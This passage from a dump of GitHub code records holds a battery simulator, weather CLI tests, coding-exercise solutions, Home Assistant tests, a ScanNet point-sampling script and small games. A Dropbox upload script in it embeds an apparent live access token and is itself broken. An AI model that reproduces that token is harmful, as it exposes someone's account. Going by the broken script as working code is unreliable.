sweet.\n configs = find_configs(os.getcwd())\n overrides, _ = _load_config_from_filepaths(configs)\n for key, value in overrides.items():\n config.override(key, value)\n\n # todo: instead of parsing requests, load the rxt and re-resolve\n # again.\n suite_path = os.path.dirname(os.path.dirname(_script))\n context = ResolvedContext(package_requests)\n\n from rez.wrapper import Wrapper\n w = Wrapper.__new__(Wrapper)\n w._init(suite_path, context_name, context, tool_name, prefix_char)\n retcode = w.run(*(_cli_args or []))\n sys.exit(retcode)\n\n\ndef register_plugin():\n return CommandSweet\n","repo_name":"davidlatwe/sweet","sub_path":"src/sweet/rezplugins/command/sweet.py","file_name":"sweet.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"75"} +{"seq_id":"34953434161","text":"import numpy as np\nimport warnings\n\nclass Battery():\n '''\n A simple simulated battery\n \n Usage: Used to simulate batteries in any optimization model, logic model, or rollout\n \n \n Input:\n \n max_capacity: float, The maximum amount of capacity the battery can contain (should non-negative)\n \n Is by standard set to 13.0\n \n current_capacity: float, The amount currently in the battery (should non-negative <= max_capacity)\n \n Is by standard set to 0.0 \n \n max_charge: float, The maximum amount that can be charged/discharged at once (should non-negative <= max_capacity)\n \n Is by standard set to 7.0\n \n degrade_rate: float, The amount the battery degrades by (should be between 0 and 1)\n \n Is by standard set to 0.05, however, when charging degrading is turned off by default\n \n \n Example: bat = Battery(max_capacity = 13.0, max_charge = 7.0)\n \n bat.charge(15.0)\n \n capacity = bat.get_current_capacity() #=7.0\n \n surplus = bat.get_surplus() #=8.0\n \n \n Additional attributes:\n \n surplus: float, How much was leftover after charging (if abs(charge amount) > max_charge)\n \n Gets updated in charge function\n \n charge_list: float list, history of what has been charged/discharged\n \n Gets updated in charge function\n \n previous_capacity: float, The previous capacity before degrading and charging\n \n Gets updated in charge function\n \n previous_degraded_capacity: float, The previous capacity after degrading, before charging\n \n Gets updated in charge function\n \n \n Functions (check their docs):\n \n charge: float -> None\n or\n float * bool -> None\n \n degrade: float -> None\n \n round_one_decimal: float -> float\n \n get_surplus: -> float\n \n get_previous_capacity: -> float\n \n get_previous_degraded_capacity: -> float\n \n get_current_capacity: -> float\n \n get_max_capacity: -> float\n \n get_percentage: -> float\n '''\n def __init__(self, max_capacity = 13.0, current_capacity = 0.0, max_charge = 7.0, degrade_rate = 0.05): \n self.max_capacity = max_capacity\n self.current_capacity = current_capacity\n self.surplus = 0.0\n self.charge_list = np.array([])\n self.max_charge = max_charge\n self.degrade_rate = degrade_rate\n self.previous_capacity = 0.0\n self.previous_degraded_capacity = 0.0\n \n #Require max_capacity >= 0\n if self.max_capacity < 0.0:\n warnings.warn(f\"max_capacity must non-negative! Setting max_capacity = 0.0\")\n self.max_capacity = 0.0\n \n #Require current_capacity <= max_capacity\n if self.current_capacity > self.max_capacity:\n warnings.warn(f\"current_capacity = {self.current_capacity} must be less than or equal to max_capcity! Setting current_capacity = {self.max_capacity}\")\n self.current_capacity = self.max_capacity\n \n #Require current_capacity >= 0\n if self.current_capacity < 0.0:\n warnings.warn(f\"current_capacity = {self.current_capacity} must be non-negative! Setting current_capacity = 0.0\")\n self.current_capacity = 0.0\n \n #Require max_charge <= max_capacity\n if self.max_charge > self.max_capacity:\n warnings.warn(f\"max_charge = {self.max_charge} must be less than or equal to max_capcity! Setting max_charge = {self.max_capacity}\")\n self.max_charge = self.max_capacity\n \n #Require max_charge >= 0\n if self.max_charge < 0.0:\n warnings.warn(f\"max_charge = {self.current_capacity} must be non-negative! Setting max_charge = 0.0\")\n self.max_charge = 0.0\n\n def charge(self, amount, degrade=False):\n \"\"\"\n Charges the battery when amount is postive and otherwise discharges it\n \n Return type: None\n\n Usage: Used whenever the battery is charged or discharged in rollouts\n\n\n Input:\n\n amount: float, Amount of kWh to charge (positive), or discharge (negative)\n\n The battery is dynamic with this input, so if charged or discharged more than\n possible, the \"surplus\" attribute will be updated, so that it is known how\n much of the input did or did not enter/leave the battery\n\n degrade: bool, Whether battery should be degraded before charging\n\n By default is False, meaning no degrading\n\n\n Example: bat = Battery(max_capacity = 13.0, max_charge = 7.0)\n \n bat.charge(15.0)\n\n capacity = bat.get_current_capacity() #=7.0\n\n surplus = bat.get_surplus() #=8.0\n \"\"\"\n self.previous_capacity = self.current_capacity\n \n #Degrade battery by 1 hour\n if degrade:\n self.degrade(1)\n \n #Shorten to one decimal\n self.current_capacity = self.round_one_decimal(self.current_capacity) \n \n capacity = self.get_current_capacity() #capacity after degrade, before charge/discharge\n self.previous_degraded_capacity = capacity\n extra_amount = 0.0\n \n if amount <= 0.0:\n #Check for overcharging\n if amount < -self.max_charge:\n extra_amount = amount + self.max_charge\n amount = -self.max_charge\n \n #Check for overdraining\n if capacity + amount < 0.0:\n overdrain = capacity + amount\n extra_amount += overdrain\n amount -= overdrain\n \n else:\n #Check for overcharging\n if amount > self.max_charge:\n extra_amount = amount - self.max_charge\n amount = self.max_charge\n \n #Check for overfilling\n if capacity + amount > self.max_capacity:\n overfill = capacity + amount - self.max_capacity\n extra_amount += overfill\n amount -= overfill\n \n #Shorten to one decimal\n og_amount = amount+extra_amount\n amount = self.round_one_decimal(amount) \n extra_amount = og_amount-amount\n \n #Charge/discharge battery by amount and shorten to two decimals (edge case)\n self.current_capacity += amount\n self.current_capacity = self.round_one_decimal(self.current_capacity) \n \n self.surplus = extra_amount\n self.charge_list = np.append(self.charge_list,[amount])\n \n def degrade(self, hours):\n \"\"\"\n Degrades the battery by the degrade_rate for input amount of hours. Using this in charge,\n the output should be rounded, as to keep the number within one decimal\n \n Return type: None\n\n Usage: Used in charge function if degrade parameter is set to True\n\n\n Input:\n\n hours: float, how many hours the battery should be degraded for\n \n Is usually hours = 1, since the data is hourly, and so one action per hour,\n meaning one degration per hour\n\n\n Example: bat = Battery(max_capacity = 13.0, current_capacity=3.0, max_charge = 7.0, degrade_rate = 0.05)\n \n bat.degrade(1)\n \n capacity = bat.get_current_capacity() #=2.85\n \"\"\"\n self.current_capacity -= self.current_capacity * self.degrade_rate * hours\n \n def round_one_decimal(self, number):\n \"\"\"\n Returns the float that ignores everything beyond the first decimal\n \n Return type: float\n \"\"\"\n return int(number*10)/10\n \n def get_surplus(self):\n \"\"\"\n Returns the class attribute \"surplus\"\n \n Return type: float\n \"\"\"\n return self.surplus\n \n def get_previous_capacity(self):\n \"\"\"\n Returns the class attribute \"previous_capacity\"\n \n Return type: float\n \"\"\"\n return self.previous_capacity\n \n def get_previous_degraded_capacity(self):\n \"\"\"\n Returns the class attribute \"previous_degraded_capacity\"\n \n Return type: float\n \"\"\"\n return self.previous_degraded_capacity\n \n def get_current_capacity(self):\n \"\"\"\n Returns the class attribute \"current_capacity\"\n \n Return type: float\n \"\"\"\n return self.current_capacity\n \n def get_max_capacity(self):\n \"\"\"\n Returns the class attribute \"max_capacity\"\n \n Return type: float\n \"\"\"\n return self.max_capacity\n \n def get_percentage(self):\n \"\"\"\n Returns how full the battery is in %\n \n Return type: float\n \"\"\"\n return self.current_capacity / self.max_capacity * 100\n \n def __str__(self):\n return f\"Capacity: {self.get_current_capacity()}\"\n\nif __name__ == \"__main__\":\n print(\"This file is meant to be imported\")","repo_name":"LortSkit/Bachelor-project","sub_path":"Functions/Battery.py","file_name":"Battery.py","file_ext":"py","file_size_in_byte":9480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"31826249977","text":"import pytest\n\nfrom improver.cli import combine\nfrom improver.tests import acceptance as acc\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\ndef test_basic(tmp_path):\n \"\"\"Test basic combine operation\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/basic\"\n kgo_path = kgo_dir / \"kgo_cloud.nc\"\n output_path = tmp_path / \"output.nc\"\n args = [\"--operation=max\",\n \"--new-name=cloud_area_fraction\",\n str(kgo_dir / \"low_cloud.nc\"),\n str(kgo_dir / \"medium_cloud.nc\"),\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\ndef test_metadata(tmp_path):\n \"\"\"Test combining with a separate metadata file\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/metadata\"\n kgo_path = kgo_dir / \"kgo_prob_precip.nc\"\n precip_meta = kgo_dir / \"prob_precip.json\"\n output_path = tmp_path / \"output.nc\"\n new_name = \"probability_of_total_precipitation_rate_between_thresholds\"\n args = [\"--operation=-\",\n f\"--new-name={new_name}\",\n f\"--metadata_jsonfile={precip_meta}\",\n str(kgo_dir / \"precip_prob_0p1.nc\"),\n str(kgo_dir / \"precip_prob_1p0.nc\"),\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\n@pytest.mark.parametrize(\"minmax\", (\"min\", \"max\"))\ndef test_minmax_temperatures(tmp_path, minmax):\n \"\"\"Test combining minimum and maximum temperatures\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/bounds\"\n kgo_path = kgo_dir / f\"kgo_{minmax}.nc\"\n timebound_meta = kgo_dir / \"time_bound.json\"\n temperatures = kgo_dir.glob(f\"*temperature_at_screen_level_{minmax}.nc\")\n output_path = tmp_path / \"output.nc\"\n args = [f\"--operation={minmax}\",\n f\"--metadata_jsonfile={timebound_meta}\",\n *[str(t) for t in temperatures],\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\ndef test_combine_accumulation(tmp_path):\n \"\"\"Test combining precipitation accumulations\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/accum\"\n kgo_path = kgo_dir / \"kgo_accum.nc\"\n rains = kgo_dir.glob(\"*rainfall_accumulation.nc\")\n timebound_meta = kgo_dir / \"time_bound.json\"\n output_path = tmp_path / \"output.nc\"\n args = [f\"--metadata_jsonfile={timebound_meta}\",\n *[str(r) for r in rains],\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n\n\n@pytest.mark.acc\n@acc.skip_if_kgo_missing\ndef test_mean_temperature(tmp_path):\n \"\"\"Test combining mean temperature\"\"\"\n kgo_dir = acc.kgo_root() / \"combine/bounds\"\n kgo_path = kgo_dir / \"kgo_mean.nc\"\n timebound_meta = kgo_dir / \"time_bound.json\"\n temperatures = kgo_dir.glob(\"*temperature_at_screen_level.nc\")\n output_path = tmp_path / \"output.nc\"\n args = [\"--operation=mean\",\n f\"--metadata_jsonfile={timebound_meta}\",\n *[str(t) for t in temperatures],\n str(output_path)]\n combine.main(args)\n acc.compare(output_path, kgo_path)\n","repo_name":"15b3/improver","sub_path":"lib/improver/tests/cube_combiner/test_cli_combine.py","file_name":"test_cli_combine.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"1948331214","text":"# 5430, AC\n'''\ndeaueue : 양쪽 끝에서 추가, 삭제가 가능한 선형 구조 형태의 자료구조\nlist사용시 시간초과 발생\n'''\n\nimport sys\nfrom collections import deque\n\nt = int(input())\n\nfor i in range(t):\n\n p = sys.stdin.readline().rstrip()\n n = int(input())\n\n # 대괄호는 포함하면 안됨\n arr = sys.stdin.readline().rstrip()[1:-1].split(\",\")\n\n # deaue생성\n queue = deque(arr)\n\n rev, front, back = 0, 0, len(queue)-1\n flag = 0\n\n # 길이가 0인 경우는 초기화\n if n == 0:\n queue = []\n front = 0\n back = 0\n\n # 시간초과 안나게 해야함\n # 뒤집는 횟수가 홀수 번일때 뒤집도록 함(짝수번일경우 할 필요 없음)\n for j in p:\n if j == 'R':\n rev += 1\n elif j == 'D':\n if len(queue) < 1:\n flag = 1\n print(\"error\")\n break\n else:\n if rev % 2 == 0:\n queue.popleft()\n else:\n queue.pop()\n if flag == 0:\n if rev % 2 == 0:\n print(\"[\" + \",\".join(queue) + \"]\")\n else:\n queue.reverse()\n print(\"[\" + \",\".join(queue) + \"]\")\n","repo_name":"jeong-sys/Study","sub_path":"Baekjoon/5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"14805885764","text":"'''\n217. 存在重复元素\n难度 简单\n\n给定一个整数数组,判断是否存在重复元素。\n如果存在一值在数组中出现至少两次,函数返回 true 。如果数组中每个元素都不相同,则返回 false 。\n\n示例 1:\n输入: [1,2,3,1]\n输出: true\n\n示例 2:\n输入: [1,2,3,4]\n输出: false\n\n示例3:\n输入: [1,1,1,3,3,4,3,2,4,2]\n输出: true\n\n'''\n\ndef containsDuplicate(nums):\n if len(nums) == len(set(nums)):\n return False\n else:\n return True\n\nnums1 = [1,2,3,1]\nnums2 = [1,2,3,4]\nnums3 = [1,1,1,3,3,4,3,2,4,2]\nprint(containsDuplicate(nums1))\nprint(containsDuplicate(nums2))\nprint(containsDuplicate(nums3))","repo_name":"yanghaotai/leecode","sub_path":"leetcode/217.存在重复元素.py","file_name":"217.存在重复元素.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18581440563","text":"__author__ = 'wxy325'\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be inserted\n # @return integer\n def searchInsert(self, A, target):\n if len(A) == 0:\n return 0\n if target < A[0]:\n return 0\n return self.searchF(A, target, 0, len(A))\n\n def searchF(self, A, target, fromIndex, toIndex):\n if A[fromIndex] == target:\n return fromIndex\n if fromIndex == toIndex - 1:\n return fromIndex + 1\n\n\n mid = (fromIndex + toIndex) / 2\n v = A[mid]\n if v > target:\n return self.searchF(A, target, fromIndex, mid)\n else:\n return self.searchF(A, target, mid, toIndex)\n\nif __name__ == '__main__':\n s = Solution()\n print(s.searchInsert([1,3], 2))","repo_name":"wxy325/leetCodePython","sub_path":"SearchInsertPosition.py","file_name":"SearchInsertPosition.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9751582741","text":"#3 6 9 게임의 왕이 되기 위한 369 마스터 프로그램을 작성해 보자.\n\nn=int(input())\n\nfor i in range(1,n+1):\n if i%10==3 or i%10==6 or i%10==9:\n print('X',end=' ')\n\n else:\n print(i,end=' ')\n","repo_name":"thetomatoaddict/TIL","sub_path":"Python/CodeUp/codeup_6082.py","file_name":"codeup_6082.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"20419587435","text":"\"\"\"The tests for the counter component.\"\"\"\n# pylint: disable=protected-access\nimport asyncio\nimport unittest\nimport logging\n\nfrom homeassistant.core import CoreState, State\nfrom homeassistant.setup import setup_component, async_setup_component\nfrom homeassistant.components.counter import (\n DOMAIN, decrement, increment, reset, CONF_INITIAL, CONF_STEP, CONF_NAME,\n CONF_ICON)\nfrom homeassistant.const import (ATTR_ICON, ATTR_FRIENDLY_NAME)\n\nfrom tests.common import (get_test_home_assistant, mock_restore_cache)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass TestCounter(unittest.TestCase):\n \"\"\"Test the counter component.\"\"\"\n\n # pylint: disable=invalid-name\n def setUp(self):\n \"\"\"Set up things to be run when tests are started.\"\"\"\n self.hass = get_test_home_assistant()\n\n # pylint: disable=invalid-name\n def tearDown(self):\n \"\"\"Stop everything that was started.\"\"\"\n self.hass.stop()\n\n def test_config(self):\n \"\"\"Test config.\"\"\"\n invalid_configs = [\n None,\n 1,\n {},\n {'name with space': None},\n ]\n\n for cfg in invalid_configs:\n self.assertFalse(\n setup_component(self.hass, DOMAIN, {DOMAIN: cfg}))\n\n def test_config_options(self):\n \"\"\"Test configuration options.\"\"\"\n count_start = len(self.hass.states.entity_ids())\n\n _LOGGER.debug('ENTITIES @ start: %s', self.hass.states.entity_ids())\n\n config = {\n DOMAIN: {\n 'test_1': {},\n 'test_2': {\n CONF_NAME: 'Hello World',\n CONF_ICON: 'mdi:work',\n CONF_INITIAL: 10,\n CONF_STEP: 5,\n }\n }\n }\n\n assert setup_component(self.hass, 'counter', config)\n self.hass.block_till_done()\n\n _LOGGER.debug('ENTITIES: %s', self.hass.states.entity_ids())\n\n self.assertEqual(count_start + 2, len(self.hass.states.entity_ids()))\n self.hass.block_till_done()\n\n state_1 = self.hass.states.get('counter.test_1')\n state_2 = self.hass.states.get('counter.test_2')\n\n self.assertIsNotNone(state_1)\n self.assertIsNotNone(state_2)\n\n self.assertEqual(0, int(state_1.state))\n self.assertNotIn(ATTR_ICON, state_1.attributes)\n self.assertNotIn(ATTR_FRIENDLY_NAME, state_1.attributes)\n\n self.assertEqual(10, int(state_2.state))\n self.assertEqual('Hello World',\n state_2.attributes.get(ATTR_FRIENDLY_NAME))\n self.assertEqual('mdi:work', state_2.attributes.get(ATTR_ICON))\n\n def test_methods(self):\n \"\"\"Test increment, decrement, and reset methods.\"\"\"\n config = {\n DOMAIN: {\n 'test_1': {},\n }\n }\n\n assert setup_component(self.hass, 'counter', config)\n\n entity_id = 'counter.test_1'\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(0, int(state.state))\n\n increment(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(1, int(state.state))\n\n increment(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(2, int(state.state))\n\n decrement(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(1, int(state.state))\n\n reset(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(0, int(state.state))\n\n def test_methods_with_config(self):\n \"\"\"Test increment, decrement, and reset methods with configuration.\"\"\"\n config = {\n DOMAIN: {\n 'test': {\n CONF_NAME: 'Hello World',\n CONF_INITIAL: 10,\n CONF_STEP: 5,\n }\n }\n }\n\n assert setup_component(self.hass, 'counter', config)\n\n entity_id = 'counter.test'\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(10, int(state.state))\n\n increment(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(15, int(state.state))\n\n increment(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(20, int(state.state))\n\n decrement(self.hass, entity_id)\n self.hass.block_till_done()\n\n state = self.hass.states.get(entity_id)\n self.assertEqual(15, int(state.state))\n\n\n@asyncio.coroutine\ndef test_initial_state_overrules_restore_state(hass):\n \"\"\"Ensure states are restored on startup.\"\"\"\n mock_restore_cache(hass, (\n State('counter.test1', '11'),\n State('counter.test2', '-22'),\n ))\n\n hass.state = CoreState.starting\n\n yield from async_setup_component(hass, DOMAIN, {\n DOMAIN: {\n 'test1': {},\n 'test2': {\n CONF_INITIAL: 10,\n },\n }})\n\n state = hass.states.get('counter.test1')\n assert state\n assert int(state.state) == 0\n\n state = hass.states.get('counter.test2')\n assert state\n assert int(state.state) == 10\n\n\n@asyncio.coroutine\ndef test_no_initial_state_and_no_restore_state(hass):\n \"\"\"Ensure that entity is create without initial and restore feature.\"\"\"\n hass.state = CoreState.starting\n\n yield from async_setup_component(hass, DOMAIN, {\n DOMAIN: {\n 'test1': {\n CONF_STEP: 5,\n }\n }})\n\n state = hass.states.get('counter.test1')\n assert state\n assert int(state.state) == 0\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/tests/components/counter/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"8166134479","text":"import numpy as np\nimport os\nimport imageio\nfrom os.path import join\nfrom os import listdir\nimport glob\nimport sys\nsys.path.append('.')\nfrom im2mesh.dvr_common import transform_to_camera_space, get_tensor_values, arange_pixels, transform_to_world\nimport torch\nimport trimesh\nfrom tqdm import tqdm\n\n\nds_path = '/is/rg/avg/mniemeyer/project_data/2020/scalable_onet/data/ScanNet/scenes'\neps = 0.01\nn_pts_pcl = 80000\nn_pts_uni = 20000\nsubsample_views = 0\nn_img_points = 5000\n\n# scenes = listdir(ds_path)\n# scenes.sort()\n# scenes = [scenes[0]]\n\n#scenes = ['scene0370_00']\nscenes = ['scene0134_02']\n\nfor scene in scenes:\n scene_path = join(ds_path, scene)\n cam = np.load(join(scene_path, 'cameras.npz'))\n pcl = np.load(join(scene_path, 'pointcloud.npz'))['points'].astype(np.float32)\n bmin, bmax = torch.from_numpy(np.min(pcl, axis=0)), torch.from_numpy(np.max(pcl, axis=0))\n depth_files = glob.glob(join(scene_path, 'depth', '*.png'))\n depth_files.sort()\n print('Number of views: %d' % (len(depth_files)))\n\n if subsample_views > 0:\n skip_ids = np.random.choice(len(depth_files), size=(len(depth_files) - subsample_views,), replace=False)\n else:\n skip_ids = []\n\n p_out = []\n p_out2 = []\n for idx, depth_file in tqdm(enumerate(depth_files)):\n if idx in skip_ids:\n continue\n cm = torch.from_numpy(cam['camera_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n wm = torch.from_numpy(cam['world_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n sm = torch.from_numpy(cam['scale_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n depth = torch.from_numpy(imageio.imread(depth_file).astype(np.float32)) / 1000\n h, w = depth.shape\n depth = depth.view(1, 1, h, w)\n #pixels = arange_pixels(resolution=(h, w))[1]\n pixels = torch.rand(1, n_img_points, 2) * 2 - 1.\n d = get_tensor_values(depth, pixels)\n mask_gt = d[:,:,0] != 0\n add_eps = torch.rand_like(d) * eps\n p_world = transform_to_world(pixels, d+add_eps, cm, wm, sm)\n d_free = (0.25 + torch.rand_like(d) * 0.75) * d\n p_world_free = transform_to_world(pixels, d_free, cm, wm, sm)\n p_out.append(p_world[mask_gt])\n p_out2.append(p_world_free[mask_gt])\n\n p_out = torch.cat(p_out).unsqueeze(0)\n occ = torch.ones(1, p_out.shape[1]).bool()\n for idx, depth_file in tqdm(enumerate(depth_files)):\n if idx in skip_ids:\n continue\n cm = torch.from_numpy(cam['camera_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n wm = torch.from_numpy(cam['world_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n sm = torch.from_numpy(cam['scale_mat_%d' % idx].astype(np.float32)).view(1, 4, 4)\n depth = torch.from_numpy(imageio.imread(depth_file).astype(np.float32)) / 1000\n h, w = depth.shape\n depth = depth.view(1, 1, h, w)\n p_cam = transform_to_camera_space(p_out, cm, wm, sm)\n pixels = p_cam[:, :, :2] / p_cam[:, :, -1].unsqueeze(-1)\n mask_pixel = (\n (pixels[:, :, 0] >= -1) &\n (pixels[:, :, 1] >= -1) &\n (pixels[:, :, 0] <= 1) &\n (pixels[:, :, 1] <= 1)\n )\n \n d_gt = get_tensor_values(depth, pixels).squeeze(-1)\n mask_gt = d_gt > 0\n d_hat = p_cam[:, :, -1]\n mask_pred = d_hat > 0\n\n mask = mask_pixel & mask_gt & mask_pred\n occ[mask] &= (d_hat >= d_gt)[mask]\n #p_out = torch.cat(p_out + p_out2)\n \n p_out = p_out[occ == 1]\n p_out = torch.cat([p_out, torch.cat(p_out2)],)\n n_p = (occ == 1).sum()\n p_uni = (torch.rand(n_p, 3) - 0.5) * 1.1\n mask_outside = torch.any((p_uni < bmin.reshape(1, 3)) | (p_uni > bmax.reshape(1, 3)), dim=-1)\n \n p_out = torch.cat([p_out, p_uni[mask_outside]]).numpy()\n occ = torch.zeros(p_out.shape[0])\n occ[:n_p] = 1.\n occ = occ.bool().numpy()\n \n out_file = join(scene_path, 'points_adv.npz')\n out_file2 = join(scene_path, 'points2_adv.ply')\n trimesh.Trimesh(vertices=p_out[occ==1], process=False).export(out_file2)\n out_dict = {\n 'points': p_out.astype(np.float16),\n 'occupancies': np.packbits(occ),\n }\n np.savez(out_file, **out_dict)\n","repo_name":"daniil-777/dynamic_geo_convolutional_onet","sub_path":"src/point_plane_net/conv_onet/scripts/dataset_scannet_depth/generate_iou_points_advanced.py","file_name":"generate_iou_points_advanced.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"23888000797","text":"import dropbox\r\n\r\nclass TransferData:\r\n def _init_(self,access_token):\r\n self.access_token=access_token\r\n\r\n def upolad_file(self,file_from,file_to):\r\n dbx=dropbox.Dropbox(self.access_token)\r\n\r\n\r\n f= open(file_from,'rb')\r\n dbx.files_upload(f.read(),file_to)\r\n\r\ndef main():\r\n access_token='sl.AhrpewlqHh79dOJ4bywfbhdzbHToDV0W9LvGduYAFZhQ7Cbvmyvo06cT9OhnnWWCsrwLlavJ_55NuAh25BJZnvh3jB2Ld6f79rwe46SXVpup0H50nZ748lErQs6x2gIENlqIAKU'\r\n transferData=TransferData(access_token)\r\n\r\n file_from = input(\"Enter the file path to transfer :-\")\r\n file_to = input(\"enter the full path to dropbox :-\") #this is the full path to upload the file to,including name as you wish the file to be called once upload\r\n\r\n #API v2\r\n transferData.upload_file(file_from,file_to)\r\n print(\"file has been moved!!!!\")\r\n\r\n\r\n main() ","repo_name":"h510-cell/fantastic-chainsaw","sub_path":"Upload File.py","file_name":"Upload File.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38330853050","text":"import random\n\nwhile True:\n user_action = input(\"Kirjuta valiku (kivi, paber, käärid): \")\n possible_actions = [\"kivi\", \"paber\", \"käärid\"]\n computer_action = random.choice(possible_actions)\n print(f\"\\nSa valisid {user_action}, arvuti valis {computer_action}.\\n\")\n\n if user_action == computer_action:\n print(f\"Kaks mängijad valisid {user_action}. see on viik!\")\n elif user_action == \"kivi\":\n if computer_action == \"käärid\":\n print(\"Kivi lõi käärid! Saa võitsid!\")\n else:\n print(\"Paber sõi kivi! Saa kaotasid.\")\n elif user_action == \"paber\":\n if computer_action == \"kivi\":\n print(\"Paber sõi kivi! Saa võitsid!\")\n else:\n print(\"Käärid lõikasid paberi! Saa kaotasid.\")\n elif user_action == \"käärid\":\n if computer_action == \"paber\":\n print(\"Käärid lõikasid paberi! Saa võitsid!\")\n else:\n print(\"Kivi lõi käärid! Saa kaotasid.\")\n\n play_again = input(\"Mängid jälle? (j/e): \")\n if play_again.lower() != \"j\":\n break","repo_name":"KevinJasin/python","sub_path":"yl22.py","file_name":"yl22.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42211468497","text":"import numpy as np\n\nfrom tensorforce import Environment, Runner\n\n\nclass MultiactorEnvironment(Environment):\n \"\"\"\n Example multi-actor environment, illustrating best-practice implementation pattern.\n\n State space: position in [0, 10].\n Action space: movement in {-1, 0, 1}.\n Random start in [3, 7].\n Actor 1 perspective as is, actor 2 perspective mirrored.\n Positive reward for being closer to 10.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def states(self):\n return dict(type='int', num_values=11)\n\n def actions(self):\n return dict(type='int', num_values=3)\n\n def num_actors(self):\n return 2 # Indicates that environment has multiple actors\n\n def reset(self):\n # Always for multi-actor environments: initialize parallel indices\n self._parallel_indices = np.arange(self.num_actors())\n\n # Single shared environment logic, plus per-actor perspective\n self._states = 3 + np.random.randint(5)\n self.second_actor = True\n states = np.stack([self._states, 10 - self._states], axis=0)\n\n # Always for multi-actor environments: return per-actor values\n return self._parallel_indices.copy(), states\n\n def execute(self, actions):\n # Single shared environment logic, plus per-actor perspective\n if self.second_actor:\n self.second_actor = self.second_actor and not (np.random.random_sample() < 0.1)\n terminal = np.stack([False, not self.second_actor], axis=0)\n delta = (actions[0] - 1) - (actions[1] - 1)\n self._states = np.clip(self._states + delta, a_min=0, a_max=10)\n states = np.stack([self._states, 10 - self._states], axis=0)\n else:\n terminal = np.stack([False], axis=0)\n delta = (actions[0] - 1)\n self._states = np.clip(self._states + delta, a_min=0, a_max=10)\n states = np.stack([self._states], axis=0)\n reward = (states - 5.0) / 5.0\n\n # Always for multi-actor environments: update parallel indices, and return per-actor values\n self._parallel_indices = self._parallel_indices[~terminal]\n return self._parallel_indices.copy(), states, terminal, reward\n\n\ndef main():\n # Multi-actor runner, automatically if environment.num_actors() > 1\n runner = Runner(\n agent='benchmarks/configs/ppo.json',\n environment=MultiactorEnvironment,\n max_episode_timesteps=10\n )\n runner.run(num_episodes=1000)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tensorforce/tensorforce","sub_path":"examples/multiactor_environment.py","file_name":"multiactor_environment.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":3258,"dataset":"github-code","pt":"75"} +{"seq_id":"29373236291","text":"documents = [\n {\"type\": \"passport\", \"number\": \"2207 876234\", \"name\": \"Василий Гупкин\"},\n {\"type\": \"invoice\", \"number\": \"11-2\", \"name\": \"Геннадий Покемонов\"},\n {\"type\": \"insurance\", \"number\": \"10006\", \"name\": \"Аристарх Павлов\"}\n]\n\ndirectories = {\n '1': ['2207 876234', '11-2'],\n '2': ['10006'],\n '3': []\n }\n\n\ndef people(n_of_document):\n for i, element in enumerate(documents):\n if n_of_document in element.values():\n return element['name']\n return 'Cannot find document'\n\n\ndef print_list():\n for i, element in enumerate(documents):\n print('{} \"{}\" \"{}\"'.format(element['type'], element['number'], element['name']))\n\n\ndef print_dir():\n print(directories)\n\n\ndef 